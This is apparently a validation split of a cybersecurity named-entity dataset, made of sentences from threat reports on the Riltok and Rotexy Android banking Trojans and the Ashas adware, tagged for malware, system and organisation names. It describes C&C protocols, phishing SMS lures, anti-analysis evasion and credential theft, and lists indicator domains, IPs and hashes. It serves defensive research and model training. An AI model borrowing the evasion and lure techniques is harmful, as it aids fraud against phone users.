{"text": "Riltok mobile Trojan : A banker with global reach 25 JUN 2019 Riltok is one of numerous families of mobile banking Trojans with standard ( for such malware ) functions and distribution methods .", "spans": {"Malware: Riltok": [[0, 6], [62, 68]]}, "info": {"id": "cyner_valid_000000", "source": "cyner_valid"}} {"text": "Originally intended to target the Russian audience , the banker was later adapted , with minimal modifications , for the European “ market. ” The bulk of its victims ( more than 90 % ) reside in Russia , with France in second place ( 4 % ) .", "spans": {}, "info": {"id": "cyner_valid_000001", "source": "cyner_valid"}} {"text": "Third place is shared by Italy , Ukraine , and the United Kingdom .", "spans": {}, "info": {"id": "cyner_valid_000002", "source": "cyner_valid"}} {"text": "We first detected members of this family back in March 2018 .", "spans": {}, "info": {"id": "cyner_valid_000003", "source": "cyner_valid"}} {"text": "Like many other bankers , they were disguised as apps for popular free ad services in Russia .", "spans": {}, "info": {"id": "cyner_valid_000004", "source": "cyner_valid"}} {"text": "The malware was distributed from infected devices via SMS in the form “ % USERNAME % , I ’ ll buy under a secure transaction .", "spans": {}, "info": {"id": "cyner_valid_000005", "source": "cyner_valid"}} {"text": "] ru/7 * * * * * 3 ” or “ % USERNAME % , accept 25,000 on Youla youla-protect [ .", "spans": {}, "info": {"id": "cyner_valid_000007", "source": "cyner_valid"}} {"text": "] ru/4 * * * * * 7 ” , containing a link to download the Trojan .", "spans": {}, "info": {"id": "cyner_valid_000008", "source": "cyner_valid"}} {"text": "Other samples were also noticed , posing as a client of a ticket-finding service or as an app store for Android .", "spans": {"System: Android": [[104, 111]]}, "info": {"id": "cyner_valid_000009", "source": "cyner_valid"}} {"text": "It was late 2018 when Riltok climbed onto the international stage .", "spans": 
{"Malware: Riltok": [[22, 28]]}, "info": {"id": "cyner_valid_000010", "source": "cyner_valid"}} {"text": "The cybercriminals behind it kept the same masking and distribution methods , using names and icons imitating those of popular free ad services .", "spans": {}, "info": {"id": "cyner_valid_000011", "source": "cyner_valid"}} {"text": "The SMS message with a link to a banker looked as follows : “ % USERNAME % , i send you prepayment gumtree [ .", "spans": {}, "info": {"id": "cyner_valid_000013", "source": "cyner_valid"}} {"text": "] cc/3 * * * * * 1 ” .", "spans": {}, "info": {"id": "cyner_valid_000014", "source": "cyner_valid"}} {"text": "Italian ( Subito.apk ) and French ( Leboncoin.apk ) versions appeared shortly afterwards in January 2019 .", "spans": {}, "info": {"id": "cyner_valid_000015", "source": "cyner_valid"}} {"text": "The messages looked as follows : “ % USERNAME % , ti ho inviato il soldi sul subito subito-a [ .", "spans": {}, "info": {"id": "cyner_valid_000016", "source": "cyner_valid"}} {"text": "] pw/6 * * * * * 5 ” ( It .", "spans": {}, "info": {"id": "cyner_valid_000017", "source": "cyner_valid"}} {"text": ") “ % USERNAME % , ti ho inviato il pagamento subitop [ .", "spans": {}, "info": {"id": "cyner_valid_000018", "source": "cyner_valid"}} {"text": ") “ % USERNAME % , je vous ai envoyé un prepaiement m-leboncoin [ .", "spans": {}, "info": {"id": "cyner_valid_000020", "source": "cyner_valid"}} {"text": "] top/7 * * * * * 3 ” ( Fr .", "spans": {}, "info": {"id": "cyner_valid_000021", "source": "cyner_valid"}} {"text": ") “ % USERNAME % , j ’ ai fait l ’ avance ( suivi d ’ un lien ) : leboncoin-le [ .", "spans": {}, "info": {"id": "cyner_valid_000022", "source": "cyner_valid"}} {"text": "] com/8 * * * * * 9 ” ( Fr .", "spans": {}, "info": {"id": "cyner_valid_000023", "source": "cyner_valid"}} {"text": "Infection The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service .", "spans": {}, "info": 
{"id": "cyner_valid_000025", "source": "cyner_valid"}} {"text": "There , they are prompted to download a new version of the mobile app , under which guise the Trojan is hidden .", "spans": {}, "info": {"id": "cyner_valid_000026", "source": "cyner_valid"}} {"text": "To be installed , it needs the victim to allow installation of apps from unknown sources in the device settings .", "spans": {}, "info": {"id": "cyner_valid_000027", "source": "cyner_valid"}} {"text": "During installation , Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning : If the user ignores or declines the request , the window keeps opening ad infinitum .", "spans": {"Malware: Riltok": [[22, 28]]}, "info": {"id": "cyner_valid_000028", "source": "cyner_valid"}} {"text": "After obtaining the desired rights , the Trojan sets itself as the default SMS app ( by independently clicking Yes in AccessibilityService ) , before vanishing from the device screen .", "spans": {}, "info": {"id": "cyner_valid_000029", "source": "cyner_valid"}} {"text": "After enabling AccessibilityService , the malware sets itself as the default SMS app Now installed and having obtained the necessary permissions from the user , Riltok contacts its C & C server .", "spans": {"Malware: Riltok": [[161, 167]]}, "info": {"id": "cyner_valid_000030", "source": "cyner_valid"}} {"text": "Phishing page from the French version of the Trojan Communication with C & C Riltok actively communicates with its C & C server .", "spans": {"Malware: Riltok": [[77, 83]]}, "info": {"id": "cyner_valid_000033", "source": "cyner_valid"}} {"text": "First off , it registers the infected device in the administrative panel by sending a GET request to the relative address gate.php ( in later versions gating.php ) with the ID ( device identifier generated by the setPsuedoID function in a pseudo-random way based on the device IMEI ) and screen ( shows if the device is active , possible values are “ on ” 
, “ off ” , “ none ” ) parameters .", "spans": {}, "info": {"id": "cyner_valid_000034", "source": "cyner_valid"}} {"text": "Then , using POST requests to the relative address report.php , it sends data about the device ( IMEI , phone number , country , mobile operator , phone model , availability of root rights , OS version ) , list of contacts , list of installed apps , incoming SMS , and other information .", "spans": {}, "info": {"id": "cyner_valid_000035", "source": "cyner_valid"}} {"text": "From the server , the Trojan receives commands ( for example , to send SMS ) and changes in the configuration .", "spans": {}, "info": {"id": "cyner_valid_000036", "source": "cyner_valid"}} {"text": "Trojan anatomy The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan .", "spans": {"Malware: Riltok": [[36, 42]]}, "info": {"id": "cyner_valid_000037", "source": "cyner_valid"}} {"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function – get address of phishing page The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile", "spans": {}, "info": {"id": "cyner_valid_000038", "source": "cyner_valid"}} {"text": "banking app used by the user .", "spans": {}, "info": {"id": "cyner_valid_000039", "source": "cyner_valid"}} {"text": "In most so-called Western versions of the Trojan , the package names in the default configuration file are erased .", "spans": {}, "info": {"id": "cyner_valid_000040", "source": "cyner_valid"}} {"text": "Depending on which app ( package name ) generated the event , Riltok 
can : Open a fake Google Play screen requesting bank card details Open a fake screen or phishing page in a browser ( inject ) mimicking the screen of the relevant mobile banking app and requesting user/bank card details Minimize the app ( for example , antivirus applications or device security settings ) Additionally , the Trojan can hide notifications from certain banking apps .", "spans": {"Malware: Riltok": [[62, 68]], "System: Google Play": [[87, 98]]}, "info": {"id": "cyner_valid_000042", "source": "cyner_valid"}} {"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing , the functionality of most of the Western versions of Riltok", "spans": {"System: Google Play": [[75, 86]]}, "info": {"id": "cyner_valid_000043", "source": "cyner_valid"}} {"text": "was somewhat pared down compared to the Russian one .", "spans": {}, "info": {"id": "cyner_valid_000044", "source": "cyner_valid"}} {"text": "Conclusion Threats are better prevented than cured , so do not follow suspicious links in SMS , and be sure to install apps only from official sources and check what permissions you are granting during installation .", "spans": {}, "info": {"id": "cyner_valid_000046", "source": "cyner_valid"}} {"text": "As Riltok shows , cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success .", "spans": {"Malware: Riltok": [[3, 9]]}, "info": {"id": "cyner_valid_000047", "source": "cyner_valid"}} {"text": "Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok 
.", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "cyner_valid_000048", "source": "cyner_valid"}} {"text": "IoCs C & C 100.51.100.00 108.62.118.131 172.81.134.165 172.86.120.207 185.212.128.152 185.212.128.192 185.61.000.108 185.61.138.108 185.61.138.37 188.209.52.101 5.206.225.57 alr992.date avito-app.pw backfround2.pw background1.xyz blacksolider93.com blass9g087.com brekelter2.com broplar3hf.xyz buy-youla.ru", "spans": {}, "info": {"id": "cyner_valid_000049", "source": "cyner_valid"}} {"text": "cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info", "spans": {}, "info": {"id": "cyner_valid_000050", "source": "cyner_valid"}} {"text": "myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa", "spans": {}, "info": {"id": "cyner_valid_000051", "source": "cyner_valid"}} {"text": "54594edbe9055517da2836199600f682dee07e6b405c6fe4b476627e8d184bfe 6e995d68c724f121d43ec2ff59bc4e536192360afa3beaec5646f01094f0b745 bbc268ca63eeb27e424fec1b3976bab550da304de18e29faff94d9057b1fa25a dc3dd9d75120934333496d0a4100252b419ee8fcdab5d74cf343bcb0306c9811", "spans": {}, "info": {"id": "cyner_valid_000052", "source": "cyner_valid"}} {"text": "e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting", "spans": {"System: Android": [[226, 233]]}, "info": {"id": "cyner_valid_000053", "source": "cyner_valid"}} {"text": 
"millions of users 24 Oct 2019 - 11:30AM We detected a large adware campaign running for about a year , with the involved apps installed eight million times from Google Play alone .", "spans": {"System: Google Play": [[161, 172]]}, "info": {"id": "cyner_valid_000054", "source": "cyner_valid"}} {"text": "We identified 42 apps on Google Play as belonging to the campaign , which had been running since July 2018 .", "spans": {"System: Google Play": [[25, 36]]}, "info": {"id": "cyner_valid_000055", "source": "cyner_valid"}} {"text": "Of those , 21 were still available at the time of discovery .", "spans": {}, "info": {"id": "cyner_valid_000056", "source": "cyner_valid"}} {"text": "We reported the apps to the Google security team and they were swiftly removed .", "spans": {}, "info": {"id": "cyner_valid_000057", "source": "cyner_valid"}} {"text": "However , the apps are still available in third-party app stores .", "spans": {}, "info": {"id": "cyner_valid_000058", "source": "cyner_valid"}} {"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas .", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[45, 68]]}, "info": {"id": "cyner_valid_000059", "source": "cyner_valid"}} {"text": "Apps of the Android/AdDisplay.Ashas family reported to Google by ESET Figure 2 .", "spans": {"Malware: Android/AdDisplay.Ashas": [[12, 35]], "Organization: ESET": [[65, 69]]}, "info": {"id": "cyner_valid_000061", "source": "cyner_valid"}} {"text": "The most popular member of the Android/AdDisplay.Ashas family on Google Play was “ Video downloader master ” with over five million downloads Ashas functionality All the apps provide the functionality they promise , besides working as adware .", "spans": {"Malware: Android/AdDisplay.Ashas family": [[31, 61]], "System: Google Play": [[65, 76]], "Malware: Ashas": [[142, 147]]}, "info": {"id": "cyner_valid_000062", "source": "cyner_valid"}} {"text": "[ Note : The analysis of the functionality below 
describes a single app , but applies to all apps of the Android/AdDisplay.Ashas family .", "spans": {"Malware: Android/AdDisplay.Ashas family": [[105, 135]]}, "info": {"id": "cyner_valid_000064", "source": "cyner_valid"}} {"text": "] Once launched , the app starts to communicate with its C & C server ( whose IP address is base64-encoded in the app ) .", "spans": {}, "info": {"id": "cyner_valid_000065", "source": "cyner_valid"}} {"text": "It sends “ home ” key data about the affected device : device type , OS version , language , number of installed apps , free storage space , battery status , whether the device is rooted and Developer mode enabled , and whether Facebook and FB Messenger are installed .", "spans": {"Organization: Facebook": [[228, 236]], "System: Messenger": [[244, 253]]}, "info": {"id": "cyner_valid_000066", "source": "cyner_valid"}} {"text": "Sending information about the affected device The app receives configuration data from the C & C server , needed for displaying ads , and for stealth and resilience .", "spans": {}, "info": {"id": "cyner_valid_000068", "source": "cyner_valid"}} {"text": "Configuration file received from the C & C server As for stealth and resilience , the attacker uses a number of tricks .", "spans": {}, "info": {"id": "cyner_valid_000070", "source": "cyner_valid"}} {"text": "For this purpose , the app receives from the C & C server the isGoogleIp flag , which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers .", "spans": {}, "info": {"id": "cyner_valid_000072", "source": "cyner_valid"}} {"text": "If the server returns this flag as positive , the app will not trigger the adware payload .", "spans": {}, "info": {"id": "cyner_valid_000073", "source": "cyner_valid"}} {"text": "Second , the app can set a custom delay between displaying ads .", "spans": {}, "info": {"id": "cyner_valid_000074", "source": "cyner_valid"}} {"text": "This delay means that a typical 
testing procedure , which takes less than 10 minutes , will not detect any unwanted behavior .", "spans": {}, "info": {"id": "cyner_valid_000076", "source": "cyner_valid"}} {"text": "Also , the longer the delay , the lower the risk of the user associating the unwanted ads with a particular app .", "spans": {}, "info": {"id": "cyner_valid_000077", "source": "cyner_valid"}} {"text": "Third , based on the server response , the app can also hide its icon and create a shortcut instead .", "spans": {}, "info": {"id": "cyner_valid_000078", "source": "cyner_valid"}} {"text": "If a typical user tries to get rid of the malicious app , chances are that only the shortcut ends up getting removed .", "spans": {}, "info": {"id": "cyner_valid_000079", "source": "cyner_valid"}} {"text": "The app then continues to run in the background without the user ’ s knowledge .", "spans": {}, "info": {"id": "cyner_valid_000080", "source": "cyner_valid"}} {"text": "Time delay to postpone displaying ads implemented by the adware Once the malicious app receives its configuration data , the affected device is ready to display ads as per the attacker ’ s choice ; each ad is displayed as a full screen activity .", "spans": {}, "info": {"id": "cyner_valid_000083", "source": "cyner_valid"}} {"text": "The adware mimics these two apps to look legitimate and avoid suspicion – and thus stay on the affected device for as long as possible .", "spans": {}, "info": {"id": "cyner_valid_000085", "source": "cyner_valid"}} {"text": "The adware activity impersonates Facebook ( left ) .", "spans": {"Organization: Facebook": [[33, 41]]}, "info": {"id": "cyner_valid_000087", "source": "cyner_valid"}} {"text": "If the user long-presses the icon , the name of the app responsible for the activity is revealed ( right ) .", "spans": {}, "info": {"id": "cyner_valid_000088", "source": "cyner_valid"}} {"text": "Finally , the Ashas adware family has its code hidden under the com.google.xxx package name .", "spans": 
{"Malware: Ashas": [[14, 19]]}, "info": {"id": "cyner_valid_000089", "source": "cyner_valid"}} {"text": "This trick – posing as a part of a legitimate Google service – may help avoid scrutiny .", "spans": {"Organization: Google": [[46, 52]]}, "info": {"id": "cyner_valid_000090", "source": "cyner_valid"}} {"text": "Some detection mechanisms and sandboxes may whitelist such package names , in an effort to prevent wasting resources .", "spans": {}, "info": {"id": "cyner_valid_000091", "source": "cyner_valid"}} {"text": "Malicious code hidden in a package named “ com.google ” Hunting down the developer Using open-source information , we tracked down the developer of the adware , who we also identified as the campaign ’ s operator and owner of the C & C server .", "spans": {}, "info": {"id": "cyner_valid_000093", "source": "cyner_valid"}} {"text": "In the following paragraphs , we outline our efforts to discover other applications from the same developer and protect our users from it .", "spans": {}, "info": {"id": "cyner_valid_000094", "source": "cyner_valid"}} {"text": "Information about the C & C domain used by the Ashas adware Knowing that the information provided to a domain registrar might be fake , we continued our search .", "spans": {"Malware: Ashas": [[47, 52]]}, "info": {"id": "cyner_valid_000097", "source": "cyner_valid"}} {"text": "The email address and country information drove us to a list of students attending a class at a Vietnamese university – corroborating the existence of the person under whose name the domain was registered .", "spans": {}, "info": {"id": "cyner_valid_000098", "source": "cyner_valid"}} {"text": "A university class student list including the C & C domain registrant Due to poor privacy practices on the part of our culprit ’ s university , we now know his date of birth ( probably : he seemingly used his birth year as part of his Gmail address , as further partial confirmation ) , we know that he was a student and what university he 
attended .", "spans": {"System: Gmail": [[235, 240]]}, "info": {"id": "cyner_valid_000100", "source": "cyner_valid"}} {"text": "We were also able to confirm that the phone number he provided to the domain registrar was genuine .", "spans": {}, "info": {"id": "cyner_valid_000101", "source": "cyner_valid"}} {"text": "Moreover , we retrieved his University ID ; a quick googling showed some of his exam grades .", "spans": {}, "info": {"id": "cyner_valid_000102", "source": "cyner_valid"}} {"text": "However , his study results are out of the scope of our research .", "spans": {}, "info": {"id": "cyner_valid_000103", "source": "cyner_valid"}} {"text": "Based on our culprit ’ s email address , we were able to find his GitHub repository .", "spans": {"Organization: GitHub": [[66, 72]]}, "info": {"id": "cyner_valid_000104", "source": "cyner_valid"}} {"text": "His repository proves that he is indeed an Android developer , but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost .", "spans": {"System: Android": [[43, 50]], "Malware: Ashas": [[114, 119]]}, "info": {"id": "cyner_valid_000105", "source": "cyner_valid"}} {"text": "However , a simple Google search for the adware package name returned a “ TestDelete ” project that had been available in his repository at some point The malicious developer also has apps in Apple ’ s App Store .", "spans": {"Organization: Google": [[19, 25]], "Organization: Apple": [[192, 197]], "System: App Store": [[202, 211]]}, "info": {"id": "cyner_valid_000106", "source": "cyner_valid"}} {"text": "Some of them are iOS versions of the ones removed from Google Play , but none contain adware functionality .", "spans": {"System: iOS": [[17, 20]], "System: Google Play": [[55, 66]]}, "info": {"id": "cyner_valid_000107", "source": "cyner_valid"}} {"text": "The malicious developer ’ s apps published on the App Store which don ’ t contain the Ashas adware Searching further for the malicious developer ’ s 
activities , we also discovered his Youtube channel propagating the Ashas adware and his other projects .", "spans": {"Malware: Ashas": [[86, 91], [217, 222]], "System: Youtube": [[185, 192]]}, "info": {"id": "cyner_valid_000109", "source": "cyner_valid"}} {"text": "As for the Ashas family , one of the associated promotional videos , “ Head Soccer World Champion 2018 – Android , ios ” was viewed almost three million times and two others reached hundreds of thousands of views , as seen in Figure 11 .", "spans": {"Malware: Ashas": [[11, 16]], "System: Android": [[105, 112]], "System: ios": [[115, 118]]}, "info": {"id": "cyner_valid_000110", "source": "cyner_valid"}} {"text": "YouTube channel of the malicious developer His YouTube channel provided us with another valuable piece of information : he himself features in a video tutorial for one of his other projects .", "spans": {"System: YouTube": [[0, 7], [47, 54]]}, "info": {"id": "cyner_valid_000112", "source": "cyner_valid"}} {"text": "Facebook profile of the C & C domain registrar ( cover picture and profile picture edited out ) Linked on the malicious developer ’ s Facebook profile , we discovered a Facebook page , Minigameshouse , and an associated domain , minigameshouse [ .", "spans": {"Organization: Facebook": [[0, 8], [134, 142], [169, 177]]}, "info": {"id": "cyner_valid_000115", "source": "cyner_valid"}} {"text": "This domain is similar to the one the malware author used for his adware C & C communication , minigameshouse [ .", "spans": {}, "info": {"id": "cyner_valid_000117", "source": "cyner_valid"}} {"text": "Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse [ .", "spans": {}, "info": {"id": "cyner_valid_000119", "source": "cyner_valid"}} {"text": "] us domain : the phone number registered with this domain is the same as the phone number appearing on the Facebook page .", "spans": {"Organization: Facebook": [[108, 116]]}, "info": {"id": 
"cyner_valid_000120", "source": "cyner_valid"}} {"text": "Facebook page managed by the C & C domain registrant uses the same base domain name ( minigameshouse ) and phone number as the registered malicious C & C used by the Ashas adware Of interest is that on the Minigameshouse Facebook page , the malicious developer promotes a slew of games beyond the Ashas family for download on both Google Play and the App Store .", "spans": {"Organization: Facebook": [[0, 8], [221, 229]], "Malware: Ashas": [[166, 171], [297, 302]], "System: Google Play": [[331, 342]], "System: App Store": [[351, 360]]}, "info": {"id": "cyner_valid_000122", "source": "cyner_valid"}} {"text": "However , all of those have been removed from Google Play – despite the fact that some of them didn ’ t contain any adware functionality .", "spans": {"System: Google Play": [[46, 57]]}, "info": {"id": "cyner_valid_000123", "source": "cyner_valid"}} {"text": "On top of all this , one of the malicious developer ’ s YouTube videos – a tutorial on developing an “ Instant Game ” for Facebook – serves as an example of operational security completely ignored .", "spans": {"System: YouTube": [[56, 63]], "Organization: Facebook": [[122, 130]]}, "info": {"id": "cyner_valid_000124", "source": "cyner_valid"}} {"text": "We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware .", "spans": {"System: Google Play": [[61, 72]], "Malware: Ashas adware": [[112, 124]]}, "info": {"id": "cyner_valid_000125", "source": "cyner_valid"}} {"text": "He also used his email account to log into various services in the video , which identifies him as the adware domain owner , beyond any doubt .", "spans": {}, "info": {"id": "cyner_valid_000126", "source": "cyner_valid"}} {"text": "Thanks to the video , we were even able to identify three further apps that contained adware functionality and were available on Google Play .", "spans": {"System: Google Play": [[129, 140]]}, 
"info": {"id": "cyner_valid_000127", "source": "cyner_valid"}} {"text": "Screenshots from this developer ’ s YouTube video shows history of checking Ashas adware on Google Play ESET telemetry Figure 15 .", "spans": {"System: YouTube": [[36, 43]], "Malware: Ashas": [[76, 81]], "System: Google Play": [[92, 103]], "Organization: ESET": [[104, 108]]}, "info": {"id": "cyner_valid_000129", "source": "cyner_valid"}} {"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ?", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[19, 42]]}, "info": {"id": "cyner_valid_000130", "source": "cyner_valid"}} {"text": "Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy .", "spans": {}, "info": {"id": "cyner_valid_000131", "source": "cyner_valid"}} {"text": "When installed on a device , apps containing adware may , among other things : Annoy users with intrusive advertisements , including scam ads Waste the device ’ s battery resources Generate increased network traffic Gather users ’ personal information Hide their presence on the affected device to achieve persistence Generate revenue for their operator without any user interaction Conclusion Based solely on open source intelligence , we were able to trace the developer of the Ashas adware and establish his identity and discover additional related adware-infected apps .", "spans": {"Malware: Ashas": [[480, 485]]}, "info": {"id": "cyner_valid_000132", "source": "cyner_valid"}} {"text": "Seeing that the developer did not take any measures to protect his identity , it seems likely that his intentions weren ’ t dishonest at first – and this is also supported by the fact that not all his published apps contained unwanted ads .", "spans": {}, "info": {"id": "cyner_valid_000133", "source": "cyner_valid"}} {"text": "At some point in his Google Play “ career ” , he 
apparently decided to increase his ad revenue by implementing adware functionality in his apps ’ code .", "spans": {"System: Google Play": [[21, 32]]}, "info": {"id": "cyner_valid_000134", "source": "cyner_valid"}} {"text": "We report them to Google and take other steps to disrupt malicious campaigns we discover .", "spans": {"Organization: Google": [[18, 24]]}, "info": {"id": "cyner_valid_000137", "source": "cyner_valid"}} {"text": "Last but not least , we publish our findings to help Android users protect themselves .", "spans": {"System: Android": [[53, 60]]}, "info": {"id": "cyner_valid_000138", "source": "cyner_valid"}} {"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan – banker and ransomware 22 NOV 2018 On", "spans": {"Organization: MITRE": [[0, 5]], "System: Google Play": [[169, 180]], "Malware: Rotexy": [[491, 497]]}, "info": {"id": "cyner_valid_000139", "source": "cyner_valid"}} {"text": "the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub .", "spans": {"Malware: Asacub": [[157, 163]]}, "info": {"id": "cyner_valid_000140", "source": "cyner_valid"}} {"text": "One of the most interesting and active specimens to date was a mobile Trojan from the Rotexy family .", "spans": {"Malware: Rotexy": [[86, 92]]}, "info": {"id": "cyner_valid_000141", "source": "cyner_valid"}} {"text": "In a three-month period from August to October 2018 , it launched over 70,000 attacks against users located 
primarily in Russia .", "spans": {}, "info": {"id": "cyner_valid_000142", "source": "cyner_valid"}} {"text": "An interesting feature of this family of banking Trojans is the simultaneous use of three command sources : Google Cloud Messaging ( GCM ) service – used to send small messages in JSON format to a mobile device via Google servers ; malicious C & C server ; incoming SMS messages .", "spans": {}, "info": {"id": "cyner_valid_000143", "source": "cyner_valid"}} {"text": "This ‘ versatility ’ was present in the first version of Rotexy and has been a feature of all the family ’ s subsequent representatives .", "spans": {"Malware: Rotexy": [[57, 63]]}, "info": {"id": "cyner_valid_000144", "source": "cyner_valid"}} {"text": "During our research we also arrived at the conclusion that this Trojan evolved from an SMS spyware Trojan that was first spotted in October 2014 .", "spans": {}, "info": {"id": "cyner_valid_000145", "source": "cyner_valid"}} {"text": "Back then it was detected as Trojan-Spy.AndroidOS.SmsThief , but later versions were assigned to another family – Trojan-Banker.AndroidOS.Rotexy .", "spans": {"Malware: Trojan-Spy.AndroidOS.SmsThief": [[29, 58]], "Malware: Trojan-Banker.AndroidOS.Rotexy": [[114, 144]]}, "info": {"id": "cyner_valid_000146", "source": "cyner_valid"}} {"text": "These website names are generated according to a clear algorithm : the first few letters are suggestive of popular classified ad services , followed by a random string of characters , followed by a two-letter top-level domain .", "spans": {}, "info": {"id": "cyner_valid_000149", "source": "cyner_valid"}} {"text": "Evolution of Rotexy 2014–2015 Since the malicious program was detected in 2014 , its main functions and propagation method have not changed : Rotexy spreads via links sent in phishing SMSs that prompt the user to install an app .", "spans": {"Malware: Rotexy": [[13, 19], [142, 148]]}, "info": {"id": "cyner_valid_000151", "source": "cyner_valid"}} {"text": "Until 
mid-2015 , Rotexy used a plain-text JSON format to communicate with its C & C .", "spans": {"Malware: Rotexy": [[17, 23]]}, "info": {"id": "cyner_valid_000153", "source": "cyner_valid"}} {"text": "For instance , the Trojan could automatically reply to an SMS and immediately delete it .", "spans": {}, "info": {"id": "cyner_valid_000155", "source": "cyner_valid"}} {"text": "The algorithm for generating the lowest-level domain name was hardwired in the Trojan ’ s code .", "spans": {}, "info": {"id": "cyner_valid_000158", "source": "cyner_valid"}} {"text": "The Trojan also registered in Google Cloud Messaging ( GCM ) , meaning it could then receive commands via that service .", "spans": {"System: Google Cloud Messaging ( GCM )": [[30, 60]]}, "info": {"id": "cyner_valid_000159", "source": "cyner_valid"}} {"text": "The Trojan ’ s assets folder contained the file data.db with a list of possible values for the User-Agent field for the PAGE command ( which downloads the specified webpage ) .", "spans": {}, "info": {"id": "cyner_valid_000161", "source": "cyner_valid"}} {"text": "If the value of this field failed to arrive from the C & C , it was selected from the file data.db using a pseudo-random algorithm .", "spans": {}, "info": {"id": "cyner_valid_000162", "source": "cyner_valid"}} {"text": "2015–2016 Starting from mid-2015 , the Trojan began using the AES algorithm to encrypt data communicated between the infected device and the C & C : Also starting with the same version , data is sent in a POST request to the relative address with the format “ / [ number ] ” ( a pseudo-randomly generated number in the range 0–9999 ) .", "spans": {}, "info": {"id": "cyner_valid_000163", "source": "cyner_valid"}} {"text": "In some samples , starting from January 2016 , an algorithm has been implemented for unpacking the encrypted executable DEX file from the assets folder .", "spans": {}, "info": {"id": "cyner_valid_000164", "source": "cyner_valid"}} {"text": "In this version of Rotexy 
, dynamic generation of lowest-level domains was not used .", "spans": {"Malware: Rotexy": [[19, 25]]}, "info": {"id": "cyner_valid_000165", "source": "cyner_valid"}} {"text": "No other significant changes were observed in the Trojan ’ s network behavior .", "spans": {}, "info": {"id": "cyner_valid_000167", "source": "cyner_valid"}} {"text": "In late 2016 , versions of the Trojan emerged that contained the card.html phishing page in the assets/www folder .", "spans": {}, "info": {"id": "cyner_valid_000168", "source": "cyner_valid"}} {"text": "The page was designed to steal users ’ bank card details : 2017–2018 From early 2017 , the HTML phishing pages bank.html , update.html and extortionist.html started appearing in the assets folder .", "spans": {}, "info": {"id": "cyner_valid_000169", "source": "cyner_valid"}} {"text": "Also , in some versions of the Trojan the file names were random strings of characters .", "spans": {}, "info": {"id": "cyner_valid_000170", "source": "cyner_valid"}} {"text": "In 2018 , versions of Rotexy emerged that contacted the C & C using its IP address .", "spans": {"Malware: Rotexy": [[22, 28]]}, "info": {"id": "cyner_valid_000171", "source": "cyner_valid"}} {"text": "‘ One-time ’ domains also appeared with names made up of random strings of characters and numbers , combined with the top-level domains .cf , .ga , .gq , .ml , or .tk .", "spans": {}, "info": {"id": "cyner_valid_000172", "source": "cyner_valid"}} {"text": "At this time , the Trojan also began actively using different methods of obfuscation .", "spans": {}, "info": {"id": "cyner_valid_000173", "source": "cyner_valid"}} {"text": "For example , the DEX file is packed with garbage strings and/or operations , and contains a key to decipher the main executable file from the APK .", "spans": {}, "info": {"id": "cyner_valid_000174", "source": "cyner_valid"}} {"text": "Application launch When launching for the first time , the Trojan checks if it is being launched in an emulation 
environment , and in which country it is being launched .", "spans": {}, "info": {"id": "cyner_valid_000176", "source": "cyner_valid"}} {"text": "If the device is located outside Russia or is an emulator , the application displays a stub page : In this case , the Trojan ’ s logs contain records in Russian with grammatical errors and spelling mistakes : If the check is successful , Rotexy registers with GCM and launches SuperService which tracks if the Trojan has device administrator privileges .", "spans": {"Malware: Rotexy": [[238, 244]], "System: GCM": [[260, 263]]}, "info": {"id": "cyner_valid_000177", "source": "cyner_valid"}} {"text": "SuperService also tracks its own status and relaunches if stopped .", "spans": {}, "info": {"id": "cyner_valid_000178", "source": "cyner_valid"}} {"text": "It performs a privilege check once every second ; if unavailable , the Trojan starts requesting them from the user in an infinite loop : If the user agrees and gives the application the requested privileges , another stub page is displayed , and the app hides its icon : If the Trojan detects an attempt to revoke its administrator privileges , it starts periodically switching off the phone screen , trying to stop the user actions .", "spans": {}, "info": {"id": "cyner_valid_000179", "source": "cyner_valid"}} {"text": "If the privileges are revoked successfully , the Trojan relaunches 